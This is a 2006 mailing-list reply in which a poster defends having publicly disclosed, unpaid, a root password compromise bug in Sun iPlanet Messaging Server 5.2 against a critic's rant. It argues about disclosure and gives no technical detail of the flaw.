Date: Sat Jun 17 21:26:13 2006
From: very at unprivate.com (php0t)
Subject: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root
	password compromise]

  Excuse me, but what have I done to you?

And why am I only supposed to disclose bugs when somebody pays me for it
?

Can you please explain your rant, so next time I can do -whatever-
different?

And by the way, I'm not 'trying to prove I can find holes', I didn't
spend any time trying to
find a hole in this specific software, I just happened to stumble upon
it in the process
of trying to gain root - after which I decided to disclose this silly
and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil
for posting this vuln?
Just tell me what's up - If your problem is that I do not get paid for
this - well - I am happy
that you are so much after what's best for me but I can do fine on my
own - thanks.

  php0t / zorro.hu

> You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.